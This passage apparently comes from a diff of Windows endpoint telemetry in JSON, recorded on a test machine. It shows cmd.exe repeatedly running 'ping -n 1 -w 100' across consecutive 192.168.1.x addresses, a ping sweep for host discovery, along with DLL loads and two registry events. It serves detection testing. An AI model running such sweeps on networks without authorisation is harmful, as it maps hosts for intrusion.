"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "process", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572981830000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.203", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7876, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "process", + 
"pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572986840000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.204", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6064, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + 
"unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "process", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572991990000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.205", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7704, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": 
"{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "process", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572996990000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.206", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1732, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572997130000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572996990000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883573000270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883573000270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "process", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573001830000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "command_line": 
"ping -n 1 -w 100 192.168.1.207", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3440, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" 
+ }, + { + "event_type": "process", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573006990000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.208", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7504, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", 
+ "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "process", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573011990000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.209", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6400, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573012150000, + "unique_pid": 